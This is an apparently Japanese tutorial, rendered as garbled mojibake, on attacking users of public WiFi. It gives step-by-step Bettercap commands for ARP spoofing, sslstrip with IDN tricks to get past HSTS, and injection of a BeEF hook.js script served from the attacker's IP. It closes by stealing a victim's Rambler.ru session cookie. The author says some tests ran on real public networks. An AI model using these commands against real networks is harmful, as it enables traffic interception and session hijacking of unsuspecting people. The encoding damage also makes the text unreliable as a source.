ãã®èšäºã§ã¯ãKulkhackerïŒãŸãã¯Script KiddieïŒã«ãªãæ¹æ³ã«ã€ããŠèª¬æããŸããããã¯ãããã°ã©ãã³ã°ã®ç¥èããªããæ¢åã®ãœãããŠã§ã¢ã䜿çšããŠã¯ã©ã¹ã¡ãŒãã®ã¹ããŒããã©ã³ãã¿ãã¬ããã«æ»æãä»æããæ¡ä»¶ä»ãæ»æè ã§ãã
åè«ã ãå®éãç§ã¯2ã€ã®ããšãç解ãããšãã課é¡ã«çŽé¢ããŸããã
- WiFi 2020 , HTTPS ( TLS 1.1+) HSTS
- ( ) ââ .
ãããŠã¹ãã€ã©ãŒã«ã¯ã¹ãã€ã©ãŒããããŸãïŒ
- ã¯ããå±éºã§ãïŒ
- ãã¶ã
ç§ã®å®éšã®ããã€ãã¯å®éã®ãããªãã¯ãããã¯ãŒã¯ã§è¡ããããã®ã®ãèªåã®ããã€ã¹ã®ãã©ãŠã¶ãžã®ãäžæ£ã¢ã¯ã»ã¹ãããåŸãããªãã£ãããšãããã«èšããªããã°ãªããŸããããããã£ãŠãå®éãç§ã¯ãã·ã¢é£éŠåæ³ç¬¬28ç« ã«éåããŠããŸãããéåããªãããšã匷ããå§ãããŸãããã®å®éšãšèšäºã¯ããããªãã¯ã¯ã€ã€ã¬ã¹ãããã¯ãŒã¯ã䜿çšããããšã®äžå®å®ããå®èšŒããããã ãã«ã¬ãã¥ãŒã®ããã«æäŸãããŠããŸãã
ã§ã¯ããªãŒãã³ã¯ã€ã€ã¬ã¹ãããã¯ãŒã¯ã®ãã©ãã£ãã¯ãã¹ããã¡ãŒã§ç°¡åã«ååã§ããå Žåãããã«ãŒã«ãšã£ãŠå®éã®åé¡ã¯äœã§ãããããåé¡ã¯ã2020幎ã«ãã»ãŒãã¹ãŠïŒ99ïŒ ïŒã®ãµã€ããHTTPSã䜿çšããããªãæè¿ã®TLSãããã³ã«ã䜿çšããŠããµãŒããŒãšæœåšçãªãç ç²è ãã®ãã©ãŠã¶ãŒéã®ãã¹ãŠã®ããŒã¿äº€æãåå¥ã®ããŒã§æå·åããããšã§ãã..ã TLSã䜿çšãããšãã¯ã©ã€ã¢ã³ããµãŒããŒã¢ããªã±ãŒã·ã§ã³ã¯ããã±ããããªãã¹ã³ããŠäžæ£ã¢ã¯ã»ã¹ãè¡ãããšãã§ããªãããã«ããããã¯ãŒã¯äžã§éä¿¡ããããšãã§ããŸããããæ£ç¢ºã«ã¯ãèãããšã¯ã§ããŸãããããŒã®ãªãæå·åããããã©ãã£ãã¯ã¯ããã埩å·åããã®ã«åœ¹ã«ç«ããªããããããã«ã¯æå³ããããŸããã
ããã«ãæè¿ã®ãã¹ãŠã®ãã©ãŠã¶ãŒã«ã¯ãHSTSïŒHTTP Strict Transport SecurityïŒã¡ã«ããºã ãå®è£ ãããŠãããHTTPSãããã³ã«ãä»ããŠå®å šãªæ¥ç¶ã匷å¶çã«ã¢ã¯ãã£ãåããåçŽãªHTTPæ¥ç¶ãçµäºããŸãããã®ã»ãã¥ãªãã£ããªã·ãŒã䜿çšãããšãHTTPãããã³ã«ã䜿çšãã代ããã«ãå®å šãªæ¥ç¶ãããã«ç¢ºç«ã§ããŸãããšã³ãžã³ã¯ç¹å¥ãªããããŒã䜿çšããŸãStrict-Transport-Securityã¯ãHTTPïŒhttpïŒ//ïŒãæ瀺çã«æå®ãããªã³ã¯ããã©ãå Žåã§ãããã©ãŠã¶ãŒã«HTTPSã®äœ¿çšã匷å¶ããŸããå ã®HSTSã¯ããµã€ããžã®ãŠãŒã¶ãŒã®æåã®æ¥ç¶ãä¿è·ããªããããããã«ãŒã«æãç©Žãæ®ããæ»æè ã¯httpãä»ããŠããå Žåãæåã®æ¥ç¶ãç°¡åã«ååã§ããŸãããããã£ãŠããã®åé¡ã«å¯ŸåŠããããã«ãæè¿ã®ã»ãšãã©ã®ãã©ãŠã¶ãŒã¯ãhttpsãããã³ã«ã®äœ¿çšãå¿ èŠãšãããµã€ãã®è¿œå ã®éçãªã¹ãïŒHSTSããªããŒããªã¹ãïŒã䜿çšããŸãã
å ¥åãããã¹ã¯ãŒãããªãããã®æ¹æ³ã§ååãããã被害è ã®Cookieãçãã ãããã«ã¯ã被害è ã®ãã©ãŠã¶ã«ã¢ã¯ã»ã¹ããããTLSæå·åãããã³ã«ã䜿çšãããŠããªãããšã確èªããå¿ èŠããããŸããäž¡æ¹ãåæã«è¡ããŸãããããè¡ãã«ã¯ãman-in-the-middleæ»ææ¹æ³ã䜿çšããŸãããïŒMitMïŒãHackney Samãã¬ãžã³ã®æ¢è£œã®ãåå®æã³ã³ã¹ãã©ã¯ã¿ãŒããå®è³ªçã«å€æŽããã«äœ¿çšãããããæ»æã¯ããªãäœã°ã¬ãŒãã«ãªãããšãäºçŽããŸããæ¬ç©ã®ããã«ãŒã¯ããæŠè£ ããŠãããçŸä»£ã®å ¬å ±ç¡ç·ãããã¯ãŒã¯ã®äžå®å®ãã®çšåºŠã説æããããã«ãç§ãã¡ã¯ç緎床ã®äœãã¯ã«ã«ãã¹ã«ãŒã®åœ¹å²ãæãããŠããã ãã§ãã
é
å®éšçšã®ããŒã«ããããšããŠã次ã®ããŒã«ãããã䜿çšããŸããã
- ããŒãã³ãŒãã®ãããªãã¯WiFiãããã¯ãŒã¯
- Netbook Acer Aspire one D270
- å èµwifiã«ãŒãAtherosAR5B125
- å€éšwifiusbWiFiã¢ããã¿ãŒTP-LINKArcher T4U v3
- å€éšwifiusbã¢ããã¿ãŒTP-LINKArcher T9UH v2
- ã«ãŒãã«ããŒãžã§ã³5.8.0ã®KaliLinux-kali2-amd64
- Bettercapã®v2.28ã®ãã¬ãŒã ã¯ãŒã¯
- ãã¬ãŒã ã¯ãŒã¯çè0.5
- 被害è ã®ããã€ã¹ãšããŠãããã€ãã®Android9ã¹ããŒããã©ã³ãšã¿ãã¬ããããã³Windows7ã©ãããããã
ãªãããã»ã©å€ãã®wifiã«ãŒããããã®ã§ããïŒã¯ããå®éšã®éçšã§ç§ã¯ããããã®çæãèžãã§ãéãç¯çŽããããšããããã§ããåªããWiFiã«ãŒããæ»æè ã®æåã®äž»ãªããŒã«ã§ããããšãå€æããŸãããå€ãã®åé¡ããããŸããã«ãŒãã¯ç£èŠããã³ã¢ã¯ã»ã¹ãã€ã³ãïŒAPïŒããµããŒãããå¿ èŠããããLinuxã«ãŒãã«ã®ããŒãžã§ã³çšã®ãã©ã€ããŒãå¿ èŠã§ãããã«ãŒãã«ã¯åªããã¢ã³ãããšä¿¡å·åŒ·åºŠãå¶åŸ¡ããæ©èœãå¿ èŠã§ããè¿œå ã®ã¬ãŒããå¿ èŠãªãå Žåã¯ããã®ãªã¹ãã®äžçªäžããé«äŸ¡ãªã¢ããã¿ãŒãåãåºããã«ãŒãã®ããŒããŠã§ã¢ãªããžã§ã³å°çšã®ãã©ã€ããŒã®ååšã確èªããããšãå¿ããªãã§ãã ããã
å èµã®AtherosAR9485ã«ãŒãã¯ãKaliã®ãã¹ãŠã®ã¢ãŒããšããã«äœ¿çšã§ãããã©ã€ããŒãåªããæ¹æ³ã§ãµããŒãããŠããŸããããä¿¡å·åŒ·åºŠãå¶åŸ¡ã§ãããã¢ã³ããã匱ããããã¢ã¯ãã£ããªå¹²æžãã§ãŒãºã§ãã®ã«ãŒãã®æå¹æ§ã倱ãããŸããã
WiFi TP-LINK Archer T4U v3ã«ã¯ããã«äœ¿çšã§ãããã©ã€ããŒããªããGithubã§èŠã€ãããã©ã€ããŒã«ã¯ã¢ã¯ã»ã¹ãã€ã³ãïŒAPïŒã¢ãŒãããµããŒããããŠããããç¬èªã«ã³ã³ãã€ã«ããå¿ èŠããããŸããã
TP-LINK Archer T9UH v2ã«ãŒãã¯ãç®±ããåºããŠããã«ãã©ã€ããŒãšå®å šã«é£æºããŸããã
ãœãããŠã§ã¢
ç§ãæåã«ããããšã¯ãã©ãããããã«Kali Linux5.8.0ãã€ã³ã¹ããŒã«ããããšã§ãããã©ãããããã®å¯äžã®SSDã¯ç©ºã§ãå®å šã«å®éšçšã§ãããããã«ãããå€ãããŒã¿ãããŒãã£ã·ã§ã³ã«åå²ããŠããã¯ã¢ããããæéãçãããããã€ã³ã¹ããŒã«æã«ãã¹ãŠã®ããã©ã«ããªãã·ã§ã³ã䜿çšããŸãããã€ã³ã¹ããŒã«äžã«é åžãããã§USBã¹ãã£ãã¯ã®ããŠã³ãã倱ã£ããããªããžããªããã·ã¹ãã ãææ°ã®ææ°ããŒãžã§ã³ã«æŽæ°ããããããªã©ããŸã ããã€ãã®äºçŽ°ãªåé¡ã«çŽé¢ããŠããŸããã
次ã«ã浞éããŒã«ãèµ·åããå¿ èŠããããŸããããããã¯BettercapãšBeEFã«ãªããŸãã圌ãã®å©ããåããŠãç§ãã¡ã¯ãç ç²è ãã®ãã©ãŠã¶ã«ãã©ãã£ãã¯ã®æå·åãæåŠããã蚪åãããµã€ãã«ããã€ã®æšéŠ¬ã®JavaScriptãæ¿å ¥ãããŸãã
Bettercapå®å šã§ã¢ãžã¥ãŒã«åŒã®ããŒã¿ãã«ã§ç°¡åã«æ¡åŒµã§ããããŒã«ãšãã¬ãŒã ã¯ãŒã¯ã§ãããman-in-the-middleæ»æãå®è¡ããããã«å¿ èŠãšãªãå¯èœæ§ã®ããããããçš®é¡ã®èšºææ©èœãšæ»ææ©èœãåããŠããŸãã Bettercapã¯Goã§æžãããŠããããããžã§ã¯ãã®äž»ãªéçºã¯2019幎ãŸã§è¡ãããŠããŸããããçŸåšã¯ãã€ããŒãªä¿®æ£ã®ã¿ãè¡ãããŠããŸãããã ããåŸã§èª¬æããããã«ãæ¥éã«å€åããæ å ±ã»ãã¥ãªãã£ã®äžçã«ããããã®ããŒã«ã¯ã2020幎ã®çµãããŸã§åŒãç¶ãé¢é£æ§ããããŸãã Bettercapã«ã¯ãarpspoofããã³sslstripã¢ãžã¥ãŒã«ãçµã¿èŸŒãŸããŠããŸãããã©ãã£ãã¯ãååããæªæã®ããè² è·ãæ³šå ¥ããã®ã¯Bettercapã§ãã
SSlstripã¯ãHTTPSããã€ãã¹ããæ¹æ³ã®1ã€ãæŽçã§ããç¹æ®ãªãããã·ãµãŒããŒã§ãããã©ãã£ãã¯ãååããã«ã¯ããŠãŒã¶ãŒã»ãã·ã§ã³ã2ã€ã®ã»ã¯ã·ã§ã³ã«åå²ããŸããã¯ã©ã€ã¢ã³ããããããã·ãµãŒããŒãžã®æåã®ã»ã¯ã·ã§ã³ã¯HTTPãããã³ã«ãçµç±ãããããã·ãããµãŒããŒãžã®2çªç®ã®ã»ã¯ã·ã§ã³ã¯æå·åãããæ¥ç¶ãééããŸããSSLstripã䜿çšãããšã被害è ã®ã»ãã·ã§ã³ã2ã€ã®éšåã«åå²ãããã©ãã£ãã¯ãååããŠããã«åæããããåçã«äœæãããHTTPããŒãžãã€ã³ãžã®èªåãªãã€ã¬ã¯ããæäŸãããã§ããŸãã
arp spoofããŒã«ã«ã®æç·ãŸãã¯ç¡ç·ã®äº€æãããã¯ãŒã¯ã§ãã±ãããååããŸãã arpspoofã¯ãARPå¿çãã¹ããŒãã£ã³ã°ããããšã«ããããããã¯ãŒã¯äžã®ã¿ãŒã²ãããã¹ãïŒãŸãã¯ãã¹ãŠã®ãã¹ãïŒããããã®ãããã¯ãŒã¯äžã®å¥ã®ãã¹ãå®ãŠã®ãã±ããããªãã€ã¬ã¯ãããŸããããã¯ãã¹ã€ãããŸãã¯wifiã«ãŒã¿ãŒã®ãã©ãã£ãã¯ãã¹ãããã£ã³ã°ããããã®éåžžã«å¹æçãªæ¹æ³ã§ãã
BeEFã¯ãXSSæ»æïŒã¯ãã¹ãµã€ãã¹ã¯ãªããã£ã³ã°ïŒã«ãã£ãŠææããã¯ã©ã€ã¢ã³ãã®ããŒã«ãäžå 管çãããããã«ã³ãã³ããçºè¡ããŠçµæãååŸã§ããããã«ãããã¬ãŒã ã¯ãŒã¯ã§ãã ãæ»æè ãã¯ãã¹ã¯ãªããhook.jsãè匱ãªãµã€ãã«æ¿å ¥ããŸãã被害è ã®ãã©ãŠã¶ããã®hook.jsã¹ã¯ãªããã¯ãæ»æè ã®ã³ã³ãã¥ãŒã¿ïŒBeEFïŒã®ã³ã³ãããŒã«ã»ã³ã¿ãŒã«ãæ°ããã¯ã©ã€ã¢ã³ãããªã³ã©ã€ã³ã§ããããšãéç¥ããŸãã ãæ»æè ããBeEFã³ã³ãããŒã«ããã«ã«å ¥ããææãããã©ãŠã¶ããªã¢ãŒãã§å¶åŸ¡ããŸãã
ããŒãžã§ã³Bettercapv2.28ãšBeEF0.5ã䜿çšããŸãããã©ã¡ããKaliLinux 5.8.0ã«ãã§ã«å«ãŸããŠã
ãŸããã³ãã³ãããã³ãããŠã£ã³ããŠãéããã³ãã³ããå ¥åããŸãã
sudo beef-xss
æªæã®ãããµã³ãã€ããã®æåã®éšåã§ããBeEFãã¬ãŒã ã¯ãŒã¯ãå§ãŸããŸãã
次ã«ããã©ãŠã¶ïŒéåžžã¯Kali Linuxã®FirefoxïŒãèµ·åããã¢ãã¬ã¹http://127.0.0.1:3000/ui/pannelãããã©ã«ãã®ãŠãŒã¶ãŒåãšãã¹ã¯ãŒãbeefïŒbeefã«ç§»åããŸãããã®åŸãæ»æã®ã³ã³ãããŒã«ã»ã³ã¿ãŒã«ç§»åããŸãã
[BeEF]ã¿ãã¯éãããŸãŸã«ããŠãããŸããåŸã§ããã®ã¿ãã«æ»ããŸãã
ãµã³ãã€ããã®2çªç®ã®éšåã§ããBettercapã«ç§»ããŸããããããã«èœãšãç©ŽããããŸãã-ãã§ã«ã·ã¹ãã ã«ãã£ãBettercapã¯ããµãŒãã¹ã®éå§ãæåŠããç§ãç解ã§ããªãä»ã®ãšã©ãŒãåºããŸããããã®ãããåé€ããŠæåã§åã€ã³ã¹ããŒã«ããããšã«ããŸãããã³ãã³ãããã³ãããŠã£ã³ããŠãéãã次ã®ã³ãã³ããå®è¡ããŸãã
sudo apt remove bettercap
sudo rm /usr/local/bin/bettercap
次ã«ãã¢ãŒã«ã€ãå ã®ãã€ããªããŒãžã§ã³ã®Bettercapv2.28ããã©ãŠã¶ã䜿çšããŠããŠã³ããŒããã©ã«ãã«ããŠã³ããŒãããŸããã«ãŒãã«ã¢ãŒããã¯ãã£ã®ããŒãžã§ã³ãéžæããããšã«æ³šæããŠãã ããã
次ã«ãå®è¡å¯èœãã¡ã€ã«ãBettercapã·ã¹ãã ã§è§£åããæåã€ã³ã¹ããŒã«çšã®ãã©ã«ããŒã«é 眮ããŸãã
d
unzip bettercap_linux_amd64_v2.28.zip
sudo mv bettercap /usr/local/bin/
Bettercapã䜿ãå§ããæãç°¡åãªæ¹æ³ã¯ãå ¬åŒã®WebãŠãŒã¶ãŒã€ã³ã¿ãŒãã§ã€ã¹ã䜿çšããããšã§ãã Webã€ã³ã¿ãŒãã§ã€ã¹ã¯ãæ®ãã®APIãµãŒãã¹ããã³å¯Ÿè©±åã³ãã³ãã©ã€ã³ã»ãã·ã§ã³ãšåæã«æ©èœããŸãã Webã€ã³ã¿ãŒãã§ã€ã¹ãã€ã³ã¹ããŒã«ããã«ã¯ã次ã®ã³ãã³ããå®è¡ããå¿ èŠããããŸãã
sudo bettercap -eval "caplets.update; ui.update; q"
泚æïŒãã§ã«ãã®æ®µéã§ãæ»æãããã¯ã€ã€ã¬ã¹ãããã¯ãŒã¯ã«æ¥ç¶ããæ»æããŠãããã·ã³ã®ã¯ã€ã€ã¬ã¹ã€ã³ã¿ãŒãã§ã€ã¹ã®IPã¢ãã¬ã¹ãååŸãããããèŠããŠããå¿ èŠããããŸãïŒã³ãã³ã
ifconfig
ã¯ãããèŠã€ããã®ã«åœ¹ç«ã¡ãŸãïŒã
Bettercapã¯ãåã ã®ã³ãã³ãã©ã€ã³ã³ãã³ããšã«ãã¬ããã®äž¡æ¹ãç解ããŸããã«ãã¬ããã¯ãé çªã«å®è¡ãããã³ãã³ãã®ãªã¹ããå«ãåãªãããã¹ããã¡ã€ã«ã§ãã http-ui capletã¯ãWebã€ã³ã¿ãŒãã§ã€ã¹ãèµ·åããããã«äœ¿çšãããŸãããã¹/usr/local/share/bettercap/caplets/http-ui.capã«æ²¿ã£ãŠãããã©ã«ãã®è³æ Œæ å ±ã衚瀺ããã³å€æŽã§ããŸãã Webã€ã³ã¿ãŒãã§ã€ã¹ã¢ãžã¥ãŒã«api.restããã³http.server127.0.0.1ã䜿çšããŠBettercapãèµ·åããã«ã¯ã次ã®ã³ãã³ããå®è¡ããŸãã
sudo bettercap -caplet http-ui
ããã§ãã¢ãã¬ã¹127.0.0.1 ïŒããŒãçªå·ãªãïŒïŒã§ãã©ãŠã¶ãŒã§å¥ã®ã¿ããéããåã®æé ã§ã¹ãã€ãŸãã¯æ§æãããè³æ Œæ å ±ïŒéåžžã¯user / passïŒã䜿çšããŠãã°ã€ã³ã§ããŸãã
Bettercap Webã€ã³ã¿ãŒãã§ã€ã¹ã¯ã³ãã³ãã©ã€ã³ãå®å šã«è€è£œãããããã³ãã³ãã©ã€ã³ããå®è¡ãããã¹ãŠã®ã¢ã¯ã·ã§ã³ïŒã¢ãžã¥ãŒã«ã®èµ·åãã¢ãŒãã®å€æŽãå€æ°ã®å€ã®å€æŽã®è¡šç€ºã蚺ææ å ±ã®è¡šç€ºïŒãWebã€ã³ã¿ãŒãã§ã€ã¹ããå®è¡ã§ããŸãã
ã³ãã³ãã©ã€ã³ãç¶è¡ããæåã®æäœãå®è¡ããŸãããã§ã«éåžžã®ã¯ã©ã€ã¢ã³ããšããŠæ¥ç¶ããŠããã¯ã€ã€ã¬ã¹ãããã¯ãŒã¯ã®åµå¯ã
net.recon on
net.probe on
Net.show
net.recon off
net.reconon-ãããã¯ãŒã¯ãã¹ãã®æ€åºãéå§ããŸãã
net.probe on-ãµããããå ã®ãã¹ãŠã®å¯èœãªIPã«åœã®ãã±ãããéä¿¡ããããšã«ããããããã¯ãŒã¯äžã®æ°ãããã¹ãã®ã¢ã¯ãã£ããããŒããéå§ããŸãã
net.show-æ€åºããããã¹ãã®ãã£ãã·ã¥ã®ãªã¹ãã衚瀺ããã³ãã³ããæäŸããŸãã
net.probeoff-ã¢ã¯ãã£ããªãããŒãã¢ãžã¥ãŒã«ããªãã«ããŸãã
Bettercapå€æ°ã¯ã次ã®ããã«æ§æããŸãã
- ééãããã·ãšããŠæ©èœããsslstripã¢ãžã¥ãŒã«ã«ãããã©ãŠã¶äº€æãç ç²è ãã®æå·åããç¡å¹ãã«ããŸããã
- ãããã«æªæã®ããè² è·ãæ³šå ¥ããŸããïŒhttp://192.168.0.103/hook.js-BeEFã¹ã¯ãªãããæ»æããããããã¯ãŒã¯ã®ã¢ããã¿ãŒã«ã«ãŒã¿ãŒããçºè¡ãããIPã䜿çšããŸãïŒã
- 被害è ã®ãã©ãŠã¶ã®ã¢ãã¬ã¹ããŒã®ã¢ãã¬ã¹ãåæ§ã®åœéåãããæåã«çœ®ãæããããšã«ãããHTSTã¡ã«ããºã ããã€ãã¹ããŸããã
ã³ãã³ãïŒ
set http.proxy.sslstrip true
set http.proxy.injectjs http://192.168.0.103/hook.js
set http.proxy.sslstrip.useIDN true
次ã«ãã¯ã€ã€ã¬ã¹ãŠãŒã¶ãŒã«å¯ŸããŠæ»æãéå§ããŸãã
ã³ãã³ã
arp.spoof on
http.proxy on
arp.spoof on-ãç ç²è ãããã€ã¹ã®ARPãã£ãã·ã¥ãã€ãºãã³ã°ãéå§ããŸãããã®ã¢ãžã¥ãŒã«ã¯ããã©ãã£ãã¯ããæ»æè ãã®ã¯ã€ã€ã¬ã¹ã€ã³ã¿ãŒãã§ã€ã¹ã«ãªãã€ã¬ã¯ãããŸããhttp.proxyon-
ééãããã·ãéå§ããŸãããã®ã¢ãžã¥ãŒã«ã¯ã転éããããã¹ãŠã®ãã©ãã£ãã¯ããã£ããããããã«åãããŠå€æŽãããããã·ãµãŒããŒãäœæããŸãã ãäŸµå ¥è ãã
ã被害è ãã¯ã€ã³ã¿ãŒãããã®äœ¿çšãéå§ããWebãµã€ãã«ã¢ã¯ã»ã¹ããŸããæåãããšãæ»æã¯ãã©ã³ã¹ããŒãæå·åã奪ããïŒã€ãŸããã¹ããã¡ãŒãçŽæ¥èãããšãã§ããããã«ãªããŸãïŒãæªæã®ããBeEFã¹ã¯ãªãããåãåããŸããããŒãžãåã蟌ãŸãããã¡ã€ã³ã®ã³ã³ããã¹ãã§å®è¡ãããBeEFã¹ã¯ãªããã¯ãCookieã®ççšãå ¥åããããã¹ã¯ãŒãã®ççšãªã©ãããŸããŸãªã¢ã¯ã·ã§ã³ãå®è¡ã§ããŸãã
æ¥ãã§äœããããµã³ãã€ããã«ãµããããã®ã§ãæ»æã¯ãã¹ãŠã®ãµã€ãã§æ©èœãããšã¯éããŸãããããšãã°ããã©ãŠã¶ã«ã¯ãã§ã«äžéšã®ãµã€ãã®HSTSããªããŒããªã¹ãããããããGoogleãµã€ãã®1ã€ã§æ»æãéå§ããå¯èœæ§ã¯éåžžã«äœãã§ããããããRamblerãŸãã¯Coub.comãããã€ãžã£ãã¯ãããããšã¯ããªãå¯èœã§ããããšãå€æããŸããããç ç²è ãïŒç€ŸäŒå·¥åŠããããªãã§ã©ãã«è¡ãããïŒã«Ro.ruã¢ãã¬ã¹ãéãããã«äŸé Œããããçªç¶åœŒå¥³ãèªåã§ãããè¡ããšã次ã®ããã«ãªããŸãã
rambler.ru Webãµã€ããžã®ãã¹ãŠã®è¢«å®³è ã®ãã©ãã£ãã¯ã¯ãã¯ãªã¢ããã¹ãã§ç©ºäžãé£è¡ããã©ã®ã¹ããã¡ãŒã§ãèãããšãã§ããŸãããã©ãŠã¶ã®ãç ç²è ãã«ããéãç®ç«ããªãäžè§åœ¢ãšã¢ãã¬ã¹ããŒã®çµããã«ããå¥ã®å¥åŠãªæåãé€ããŠãåé¡ã®å åã¯ã»ãšãã©ãããŸããã
ãŸããBeEFãã¬ãŒã ã¯ãŒã¯ã®ã³ã³ãããŒã«ããã«ã®ãæ»æè ãã®ãã·ã³ã®[ãªã³ã©ã€ã³ãã©ãŠã¶]ã»ã¯ã·ã§ã³ã«ãããã¯ã«åŒã£ããã£ãæ°ãããã©ãŠã¶ã«é¢ãããšã³ããªã衚瀺ãããŸãããã®ãã©ãŠã¶ãããŠã¹ã§éžæãã[ã³ãã³ã]ãµãã¿ãã«ç§»åããŠã[ãã©ãŠã¶]ãã£ã¬ã¯ããªã«ç§»åããç¶ããŠãã¡ã€ã³ãããã¯âCookieãååŸâå®è¡
äžåºŠãããŠã¹ãæ°åã¯ãªãã¯ããã ãã§ã被害è ããRambler.ruWebãµã€ãã®ã»ãã·ã§ã³Cookieãçã¿ãŸãããããã§ããããããã©ãŠã¶ã«æ¿å ¥ããŠã被害è ã®ã»ãã·ã§ã³ã«åå ããããšãã§ããŸãããããŠãããã¯ãã ã®ãããã§ãïŒããããBeEFã®æŠåšåº«ã«ã¯ãããã£ãããããããã©ãŠã¶ã«éä¿¡ã§ããæ°çŸã®ç°ãªããã³ãã³ããããŸã ãããŸããããŸããŸãªãã£ãã·ã³ã°ãªãã·ã§ã³ããã¹ã¯ãŒãã®ççšããªããŒã«ããªãã€ã¬ã¯ãããšã¯ã¹ããã€ããªã©ã§ãã
çµè«
å®éšã®çµè«ã¯æåŸ å€ãã§ãããã©ãŠã¶ã¯ããã©ãã£ãã¯ã®æ¹ããããã®ãµã€ãããã£ãã·ã³ã°ã«çœ®ãæããããšãããŠãŒã¶ãŒã100ïŒ ä¿è·ããããšã¯ã§ããŸãããHSTSã¡ã«ããºã ã¯ãæã人æ°ã®ããæ°åã®ãµã€ãã§ã®ã¿æ©èœããä»ã®äœçŸäžãã®ãµã€ããä¿¡é Œã§ããä¿è·ãªãã§æ®ããŸãããã©ãŠã¶ã¯ããµãŒããŒãžã®æ¥ç¶ãæå·åãããŠããªãããšãèŠåããã»ã©æ瀺çã§ã¯ãããŸãããã¯ã€ã€ã¬ã¹ãããã¯ãŒã¯ã§ã¯ç¶æ³ã¯ããã«æªåããŸããã¯ã€ã€ã¬ã¹ãããã¯ãŒã¯ã§ã¯ãããŒã¿äŒéã¡ãã£ã¢ã«ã¢ã¯ã»ã¹ããã人ã¯ã»ãšãã©ããŸããããã¢ã¯ã»ã¹ãã€ã³ãèªäœã®ä¿¡é Œæ§ã確èªãããŠãŒã¶ãŒã¯ã»ãšãã©ããããã¢ã¯ã»ã¹ãã€ã³ãã®ä¿¡é Œã§ããèªèšŒæ¹æ³ã¯ååšããŸããã